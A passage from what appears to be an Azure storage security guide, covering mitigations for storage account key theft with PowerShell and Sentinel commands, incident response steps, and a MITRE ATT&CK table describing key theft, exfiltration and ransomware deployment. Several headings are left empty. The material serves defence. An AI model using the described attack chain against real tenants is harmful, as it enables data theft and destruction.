  4. Disable: After successful migration, disable shared keys

Validation Command (Verify Escalation Blocked):

# After disabling shared keys, attempt retrieval:
try {
    $Keys = Get-AzStorageAccountKey -ResourceGroupName "production-rg" -AccountName "prodstorageacct001" -ErrorAction Stop
    Write-Host "[-] Shared keys still retrievable!" -ForegroundColor Red
} catch {
    Write-Host "[+] Key retrieval blocked - shared key access disabled!" -ForegroundColor Green
}

Expected Output:

[+] Key retrieval blocked - shared key access disabled!

References:


1.2 Use User Delegation SAS Tokens (Time-Limited, Entra ID-Signed)

Objective: Replace Account SAS tokens with User Delegation SAS (respects RBAC, expires automatically, better auditability).

Applies To: All storage accounts (after disabling shared keys)

Impact: Limits token scope and lifetime

Manual Steps (Generate User Delegation SAS - PowerShell):

# Get user delegation key (signed by Entra ID user, not account key)
$StorageAccountName = "prodstorageacct001"
$ResourceGroupName = "production-rg"

# Create storage context (using Entra ID authentication, not keys)
$StorageContext = New-AzStorageContext -StorageAccountName $StorageAccountName -UseConnectedAccount

# Get user delegation key (valid for 1 hour)
$UserDelegationKey = Get-AzStorageUserDelegationKey -StorageContext $StorageContext

# Generate User Delegation SAS (scoped to single container, 1 hour expiry)
$SASToken = New-AzStorageContainerSASToken -Name "customer-data" `
    -Permission rl `
    -ExpiryTime (Get-Date).AddHours(1) `
    -Context $StorageContext `
    -UserDelegationKey $UserDelegationKey

Write-Host "User Delegation SAS: $SASToken"
Write-Host "[+] Token expires in 1 hour; respects RBAC of issuing user"

Expected Output:

User Delegation SAS: sv=2021-06-08&ss=b&srt=c&sp=rl&se=2026-01-06T12:06:00Z&st=2026-01-06T11:06:00Z&spr=https&sig=ABC123DEF456==

[+] Token expires in 1 hour; respects RBAC of issuing user

Advantages of User Delegation SAS:

References:


1.3 Enable Diagnostic Logging & Real-Time Alerting

Objective: Capture all blob access operations and alert on suspicious patterns.

Applies To: All storage accounts

Impact: Enables detection of METHOD 1, 3, 4 attacks

Manual Steps (see Section 9 above for details)


Priority 2: HIGH

2.1 Implement Private Endpoints + Network Firewall

Objective: Restrict storage account access to private network only; prevent internet-accessible key extraction.

Applies To: Storage accounts containing sensitive data

Manual Steps (Azure Portal):

  1. Navigate to Storage AccountNetworking
  2. Click + Private endpoint
  3. Resource group: Your resource group
  4. Name: prod-storage-private-endpoint
  5. Sub-resource: blob (for blob storage)
  6. Virtual network: Your private VNet
  7. Subnet: Private subnet
  8. Click Create
  9. Go to NetworkingFirewall
  10. Set Default Action: Deny
  11. Add authorized IPs/vNets: Corporate VPN, app servers, etc.
  12. Save

Impact:


2.2 Implement Managed Identities (Eliminate Keys in Code)

Objective: Replace hardcoded storage keys in applications with Azure Managed Identity (automatic, time-bound authentication).

Applies To: Azure-hosted applications (VMs, Functions, App Services, Containers)

Impact: Reduces exposure of keys in source code, CI/CD logs

Manual Steps (Assign Managed Identity to VM):

  1. Navigate to Virtual Machine → Select VM
  2. Left menu → Identity
  3. Status: ON
  4. Save
  5. Navigate to Storage AccountAccess Control (IAM)
  6. Click + Add role assignment
  7. Role: Storage Blob Data Contributor (or Reader if read-only)
  8. Assign to: Managed Identity → Select the VM
  9. Save

Application Code:

// No secrets in code!
var credential = new DefaultAzureCredential();  // Uses managed identity
var client = new BlobContainerClient(new Uri("https://storageacct.blob.core.windows.net/container"), credential);
var blobs = client.GetBlobs();

2.3 Enable Microsoft Defender for Storage

Objective: Automated detection of malware, unusual access patterns, data exfiltration.

Applies To: All storage accounts

Manual Steps (Azure Portal):

  1. Navigate to Storage AccountDefender for Cloud
  2. Enable: Defender for Storage
  3. Save

Manual Steps (PowerShell):

# Enable Defender for Storage
$StorageAccountId = "/subscriptions/{subId}/resourceGroups/{rg}/providers/Microsoft.Storage/storageAccounts/{accountName}"

Update-AzSecurityPricing -PricingTier "Standard" -ResourceType "StorageAccounts"

Alerts Include:


11. DETECTION & INCIDENT RESPONSE

Indicators of Compromise (IOCs)

Azure Activity Log Patterns

Storage Blob Log Patterns

Network Indicators


Forensic Artifacts

Azure Activity Log

Storage Blob Logs (AzureDiagnostics)

Audit Trail


Response Procedures

Step 1: Isolate Storage Account

Objective: Prevent further data exfiltration while investigation proceeds.

Command (Disable Access - All Methods):

# Option 1: Enable firewall (blocks all internet access)
Update-AzStorageAccount -ResourceGroupName "production-rg" -AccountName "prodstorageacct001" `
    -NetworkRuleBypassDefaultAction "None" `
    -DefaultAction Deny

# Option 2: Disable access temporarily (regenerate keys)
$StorageAccount = Get-AzStorageAccount -ResourceGroupName "production-rg" -Name "prodstorageacct001"
New-AzStorageAccountKey -ResourceGroupName "production-rg" -Name "prodstorageacct001" -KeyName Primary

Write-Host "[+] Storage account access restricted"
Write-Host "[!] Primary key rotated - all old keys now invalid"

Impact:


Step 2: Rotate All Access Keys

Objective: Invalidate stolen keys immediately.

Command (All Versions):

# Rotate primary key
New-AzStorageAccountKey -ResourceGroupName "production-rg" -Name "prodstorageacct001" -KeyName Primary

Write-Host "[+] Primary key rotated (old key invalidated)"

# Wait 5 minutes
Start-Sleep -Seconds 300

# Rotate secondary key
New-AzStorageAccountKey -ResourceGroupName "production-rg" -Name "prodstorageacct001" -KeyName Secondary

Write-Host "[+] Secondary key rotated (all old keys invalidated)"
Write-Host "[!] Applications using old keys now fail - update config immediately"

Step 3: Investigate Exfiltrated Data

Objective: Determine what data was accessed.

Command (Query Blob Logs):

// Sentinel: Determine accessed blobs
StorageBlobLogs
| where OperationName == "GetBlob"
| where CallerIpAddress == "203.0.113.50"  // Attacker IP
| where TimeGenerated between (datetime(2026-01-06 10:00:00Z) .. datetime(2026-01-06 12:00:00Z))
| summarize TotalBytes = sum(ResponseContentLength), AccessCount = count() by Resource, Identity
| order by TotalBytes desc

Expected Output:

Resource                              TotalBytes    AccessCount  Identity
----                                  ----------    -----------  --------
customer-data-export-2026.csv         850000000    1            svc_attacker
database-backup-2026-01-06.bak        850000000000 1            svc_attacker
customer-pii.sql                      45000000     1            svc_attacker

Total: ~1.7 TB exfiltrated

Step 4: Determine Scope of Compromise

Objective: Identify if exfiltrated data was used elsewhere.

Actions:


Step Phase Technique MITRE ID Description Enablement
1 Initial Access Phishing / Web Exploit T1566 / T1190 Compromise developer/admin machine Enables code execution
2 Execution PowerShell / Cloud CLI T1059 Execute Azure commands Enables Azure authentication
3 Persistence Create Service Principal T1136 Create attacker-controlled identity in Entra ID Enables future access
4 Privilege Escalation (Optional) RBAC Role Assignment Abuse T1098 Elevate to Storage Account Key Operator role PREREQUISITE for METHOD 1
5 Credential Access (Current) Storage Account Key Theft T1552.001 Retrieve storage account keys Enables unrestricted storage access
6 Collection Data from Cloud Storage T1530 Download blobs/files Enables data exfiltration
7 Exfiltration Unencrypted Channel T1048 Transfer data to attacker infrastructure IMPACT: Data breach
8 Impact Data Destruction / Ransomware T1485 / T1561 Delete backups, deploy encryption FINAL IMPACT: Unrecoverable loss

13. REAL-WORLD EXAMPLES

Example 1: Microsoft AI Researchers Data Exposure (September 2023)


Example 2: Storm-0501 Cloud Storage Campaign (2025)


Example 3: Azure Misconfiguration Chain Leading to Admin Compromise (June 2025)


Example 4: Backup Data Exfiltration & Ransomware Deployment


14. INCIDENT RESPONSE CHECKLIST

Immediate Actions (0-2 hours)

Short-Term Actions (2-24 hours)

Medium-Term Actions (1-2 weeks)

Long-Term Actions (Ongoing)